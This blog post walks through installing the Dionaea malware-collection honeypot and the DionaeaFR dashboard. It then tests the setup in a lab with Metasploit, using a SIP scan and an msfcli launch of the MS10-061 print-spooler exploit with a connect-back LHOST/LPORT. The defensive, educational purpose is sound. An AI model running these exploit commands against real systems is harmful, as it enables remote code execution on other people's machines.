Skip to main content
Dionaea – A Malware collection honeypot

Introduction 

This post outlines the necessary requirements, configurations and step by step installation procedure for honeypot Dionaea. It also briefs the logging of various attacks from external entities and produces the results to a dashboard interface feature for ease of understanding.

Dionaea


Dionaea is one of the modern malware collection honeypots that’s aimed to trap malware exploiting vulnerabilities exposed by services offered over a network to obtain a copy of malware. Dionaea emulates protocols by embedding python as its scripting language and also detects shellcodes using LibEmu. It also supports IPv6 and TLS. Dionaea traps malware from below mentioned protocols.
SMB (Server Message Block): 
HTTP (Hyper Text Transfer Protocol)
FTP (File Transfer Protocol)
TFTP (Trivial File Transfer Protocol) 
MSSQL (Microsoft SQL Server) 
VoIP (Voice over IP) 

Requirements 

Ubuntu 12.04 LTS Server 

Configuration 

·      sudo apt-get install libudns-dev libglib2.0-dev libssl-dev libcurl4-openssl-dev libreadline-dev libsqlite3-dev python-dev libtool automake autoconf build-essential subversion git-core flex bison pkg-config libgc-dev libgc1c2 sqlite3 python-geoip sqlite python-pip
·      Create /opt/dionaea/ directory
mkdir /opt/dionaea/
·      Create temp directory  for installation
mkdir ~/src
·       Install Liblcfg Package
cd ~/src
git clone git://git.carnivore.it/liblcfg.git liblcfg
cd liblcfg/code
autoreconf -vi
./configure --prefix=/opt/dionaea
make install
·       Install Libemu package
cd ~/src
git clone git://git.carnivore.it/libemu.git libemu
cd libemu
autoreconf -vi
./configure --prefix=/opt/dionaea
ldconfig
·       Install Libnl
Incase of Ubuntu
apt-get install libnl-3-dev libnl-genl-3-dev libnl-nf-3-dev libnl-route-3-dev
or else install it from git
cd ~/src
git clone git://git.infradead.org/users/tgr/libnl.git
cd libnl
autoreconf -vi
export LDFLAGS=-Wl,-rpath,/opt/dionaea/lib
./configure --prefix=/opt/dionaea
make
make install
ldconfig
·       Install Libev
tar -xvzf libev-4.04.tar.gz
cd libev-4.04
make install
·       Install python 3.2
cd ~/src
tar xfz Python-3.2.2.tgz
./configure --enable-shared --prefix=/opt/dionaea --with-computed-gotos --enable-ipv6 LDFLAGS="-Wl,-rpath=/opt/dionaea/lib/ -L/usr/lib/x86_64-linux-gnu/"
make
make install
ldconfig 
·       Install Cython 
cd ~/src
tar xfz Cython-0.21rc1.tar.gz
cd Cython-0.21rc1
/opt/dionaea/bin/python3 setup.py install
ldconfig
·       Install Libcurl
sudo apt-get install curl libc6 libcurl3 zlib1g
·       Install Libpcap
tar xfz libpcap-1.6.2.tar.gz
cd libpcap-1.6.2
./configure --prefix=/opt/dionaea
make
make install
ldconfig
·       Install p0f
apt-get install p0f -y
cd /
mkdir nonexistent
chown -R nobody:nogroup nonexistent
·       Clone Dionaea from github
cd ~/src
git clone git://git.carnivore.it/dionaea.git dionaea
·       Compile Dionaea
cd ~/src/dionaea
autoreconf –vi
./configure --with-lcfg-include=/opt/dionaea/include/ \
     --with-lcfg-lib=/opt/dionaea/lib/ \
     --with-python=/opt/dionaea/bin/python3.2 \
     --with-cython-dir=/opt/dionaea/bin \
     --with-udns-include=/opt/dionaea/include/ \
     --with-udns-lib=/opt/dionaea/lib/ \
     --with-emu-include=/opt/dionaea/include/ \
     --with-emu-lib=/opt/dionaea/lib/ \
     --with-gc-include=/usr/include/gc \
     --with-ev-include=/opt/dionaea/include \
     --with-ev-lib=/opt/dionaea/lib \
     --with-nl-include=/opt/dionaea/include \
     --with-nl-lib=/opt/dionaea/lib/ \
     --with-curl-config=/usr/bin/ \
     --with-pcap-include=/opt/dionaea/include \
     --with-pcap-lib=/opt/dionaea/lib/
make
make install
·       Test Dionaea installation
/opt/dionaea/bin/dionaea --help
/opt/dionaea/bin/dionaea -r /opt/dionaea

DionaeaFR – Dashboard 

·      Install pip (Python package manager) and python-netaddr package
apt-get install python-pip python-netaddr
·    Install prerequisites using pip
pip install Django
pip install pygeoip
pip install django-pagination
pip install django-tables2
pip install django-compressor
pip install django-htmlmin
·    Install django-tables2-simplefilter
cd /opt/
unzip django-tables2-simplefilter.zip
mv django-tables2-simplefilter-master/ django-tables2-simplefilter/
cd django-tables2-simplefilter/
python setup.py install
·    Install PySubnetTree
cd /opt/
cd pysubnettree/
python setup.py install
·    Compile and install Node.js from sources
cd /opt/
tar xzvf node-v0.8.16.tar.gz
cd node-v0.8.16
./configure
make
make install
·    Install LESS using npm
npm install -g less
·    Download DionaeaFR
unzip DionaeaFR.zip
mv DionaeaFR-master/ DionaeaFR
·    Get Maxmind’s GeoIP and GeoLite databases
cd /opt/
gunzip GeoLiteCity.dat.gz
gunzip GeoIP.dat.gz
mv GeoIP.dat DionaeaFR/DionaeaFR/static
mv GeoLiteCity.dat DionaeaFR/DionaeaFR/static
·    If Dionaea installation doesn’t follow official Dionaea installation guide,  the line 17 in /opt/DionaeaFR/DionaeaFR/settings.py should be set  to dionaea’s sqlite db
·    Change STATIC_ROOT variable in settings.py “Dionaea FR’s folder/static/”
·    To start DionaeaFR
cd /opt/DionaeaFR/
sudo python manage.py collectstatic  #type yes when asked
     sudo python manage.py runserver 0.0.0.0:8080 
·    DionaeaFR’s interface can also accessible via remote

Logging 

Run Dionaea to start enabling logging. Here, Dionaea is running with IP 192.168.0.109 and check for network connections status using netstat 
·      /opt/dionaea/bin/dionaea -r /opt/Dionaea

·      netstat –ntlp | grep 192.168.0.109




A nmap scan on 192.168.0.109 has come up with above ports as opened and services can be exploited with the vulnerabilities associated to them for example, to do more reconnaissance on SIP it can be scanned with various options using metasploit auxiliary. Meanwhile Dionaea picks up the traffic while metasploit auxiliary scanning is going on. The scanning traffic has been logged as shown in below fig. 


The auxiliary SIP Options scan on Port 5060 
msfcli auxiliary/scanner/sip/options CHOST=192.168.0.169 CPORT=5066                           RHOST=192.168.0.109 RPORT=5060 E

 Looking into the Dionaea log file located at /opt/Dionaea/var/log/dionaea.log, we can investigate into connection traffic and find out possible attack indicators. But, querying dionaea’s LogSQL SQLite database using a python script readlogsqltree gives the better understandable output. It can also give information logged on each incident with exploited vulnerability, time, attacker, information about shellcodes. 
python3.2 /opt/dionaea/bin/readlogsqltree /opt/dionaea/var/dionaea/logsql.sqlite




Now let’s exploit the vulnerability (MS10-061) in print spool service which could allow remote code execution. Since Dionaea emulates SMB service to trap the malware now let’s exploit the remote code execution vulnerability in print spooler service on windows systems. 

msfcli exploit/windows/smb/ms10_061_spoolss PNAME=XPSPrinter RHOST=192.168.0.109 EXITFUNC=process LHOST=192.168.0.169 LPORT=4444 E

Dionaea detects and pick up the incidents as shown in below figure 


Let’s check the /opt/dionaea/var/dionaea/binaries directory to see whether dionaea captured any binary executable or not. Here we go 


Meanwhile querying the Dionaea’s LogSQL SQLite database can give better understanding of the traffic hit by attack
python3.2 /opt/dionaea/bin/readlogsqltree /opt/dionaea/var/dionaea/logsql.sqlite



Dashboard


DionaeaFR is a frontend dashboard interface to visualize the results of Dionaea honeypot. It provides the connections, downloaded malwares and attacker’s geo locations. It can also filter out the results based on states, protocols, services, ports and remote ports. It runs on local machine and also accessible remotely. To run the DionaeaFR 
•  cd /opt/DionaeaFR 
    sudo python manage.py collectstatic #type yes when asked 
    sudo python manage.py  runserver 0.0.0.0:8080 


Using filters the SIP sessions service can be seen in below figure 


The downloaded malwares can be seen in the dashboard interface 

Conclusion 

The collected malwares can be analyzed further to better understand the attacks. The geo locations of the attackers can be seen in dashboard maps interface. The dashboard interface can also be accessible remotely for interactive monitoring.



















Comments

Post a Comment

Popular posts from this blog

Memory Analysis of WannaCry Ransomware

Introduction 
This post explains the memory dump analysis of WannaCry infected system using volatility (An open source memory forensics framework) and other open source tools. It doesn't cover the analysis of initial infection vector, propagation and recovery of infected system. The objective is to leverage memory forensic analysis to uncover and extract Indicators of Compromise (IoC) 


WannaCry 
WannaCry (or WannaCrypt, WanaCrypt0r 2.0, Wanna Decryptor) is a ransomware program targeting the Microsoft Windows operating system. On Friday, 12 May 2017, a large cyber-attack using it was launched, infecting more than 230,000 computers in 150 countries, demanding ransom payments in the cryptocurrency bitcoin in 28 languages.The attack has been described by Europol as unprecedented in scale. https://en.wikipedia.org/wiki/WannaCry_ransomware_attack

Discalimer
You are dealing with real malware samples Don’t expose them to internal networks or internet Analyze them in a controlled environme…

Memory dump analysis of Donny's System

Introduction 

This post solves the mystery of Donny's System  and outlines how to utilize memory forensics methodology to uncover artifacts from memory dumps

Tools: Volatility, Yara  & Windows Powershell

Analysis

Six-step investigative methodology by SANS

Identify rogue processes Analyze process DLLs and handles  Review network artifacts Look for evidence of code injection Check for signs of rootkitDump suspicious processes and drivers  Run volatility imageinfo plugin  to identify profile  PS C:\volatility> .\vol.exe -f .\unknown.vmem imageinfo
Run Volatility pslist plugin to see active running processes
PS C:\volatility> .\vol.exe -f .\unknown.vmem --profile=WinXPSP3x86 pslist
Just to remind that all process creation and termination timings are specified in UTC. Ensure to change them to system timezone while correlating the events with other sources of evidence
game.exe clearly looks suspicious as it ran and exit in a short span of time. The most interesting part was explor…

Malicious document analysis Part - 1

Introduction 
A basic and quick approach to analyse phishing documents to identify indicators of maliciousness. FYI this post doesn't cover complete & in depth analysis of malicious documents

Tools 
Didier Stevens Suite sudo pip install oletools Yara - A pattern matching Swiss knife Analysis  All document samples are pulled from Hybrid Analysis - a free malware analysis service for the community that detects and analyzes unknown threats using a unique Hybrid Analysis technology. 
Hash 1: e07c84f98332b07ae40a22f15c32cbf794586e26576a7539def667881e15beae

Download above mentioned sample and check the integrity
Check the file properties using native Linux file command which gives quick idea about sample
Download Didier Stevens Suite and check for yara rules.
Run various rules against the sample document to identify any sort of maliciousness
The below rule can identify an executable file embedded in OLE objects
 Run above yara rule against the downloaded document
Observe the below mald…